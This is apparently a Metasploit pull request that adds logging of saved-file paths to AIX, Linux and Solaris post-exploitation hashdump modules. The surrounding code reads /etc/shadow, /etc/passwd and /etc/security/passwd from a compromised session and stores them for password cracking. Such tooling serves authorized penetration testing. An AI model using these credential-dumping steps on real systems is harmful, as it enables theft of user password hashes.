### PR TITLE
[SeeRM:#8135] - Be able to show where store_loot saves a file

### DIFF
--- a/modules/post/aix/hashdump.rb
+++ b/modules/post/aix/hashdump.rb
@@ -35,7 +35,8 @@ class Metasploit3 < Msf::Post
 		if is_root?
 			passwd_file = read_file("/etc/security/passwd")
 			jtr = parse_aix_passwd(passwd_file)
-			store_loot("aix.hashes", "text/plain", session, jtr, "aix_passwd.txt", "AIX Password File")
+			p = store_loot("aix.hashes", "text/plain", session, jtr, "aix_passwd.txt", "AIX Password File")
+			vprint_status("Passwd saved in: #{p.to_s}")
 		else
 			print_error("You must run this module as root!")
 		end

--- a/modules/post/linux/gather/hashdump.rb
+++ b/modules/post/linux/gather/hashdump.rb
@@ -37,8 +37,10 @@ class Metasploit3 < Msf::Post
 			shadow_file = read_file("/etc/shadow")
 
 			# Save in loot the passwd and shadow file
-			store_loot("linux.shadow", "text/plain", session, shadow_file, "shadow.tx", "Linux Password Shadow File")
-			store_loot("linux.passwd", "text/plain", session, passwd_file, "passwd.tx", "Linux Passwd File")
+			p1 = store_loot("linux.shadow", "text/plain", session, shadow_file, "shadow.tx", "Linux Password Shadow File")
+			p2 = store_loot("linux.passwd", "text/plain", session, passwd_file, "passwd.tx", "Linux Passwd File")
+			vprint_status("Shadow saved in: #{p1.to_s}")
+			vprint_status("passwd saved in: #{p2.to_s}")
 
 			# Unshadow the files
 			john_file = unshadow(passwd_file, shadow_file)

--- a/modules/post/solaris/gather/hashdump.rb
+++ b/modules/post/solaris/gather/hashdump.rb
@@ -37,8 +37,10 @@ class Metasploit3 < Msf::Post
 			shadow_file = read_file("/etc/shadow")
 
 			# Save in loot the passwd and shadow file
-			store_loot("solaris.shadow", "text/plain", session, shadow_file, "shadow.tx", "Solaris Password Shadow File")
-			store_loot("solaris.passwd", "text/plain", session, passwd_file, "passwd.tx", "Solaris Passwd File")
+			p1 = store_loot("solaris.shadow", "text/plain", session, shadow_file, "shadow.tx", "Solaris Password Shadow File")
+			p2 = store_loot("solaris.passwd", "text/plain", session, passwd_file, "passwd.tx", "Solaris Passwd File")
+			vprint_status("Shadow saved in: #{p1.to_s}")
+			vprint_status("passwd saved in: #{p2.to_s}")
 
 			# Unshadow the files
 			john_file = unshadow(passwd_file, shadow_file)


### PR DESCRIPTION
If you don't print where store_loot saves the file, it can be a pain in the butt to find it sometimes.
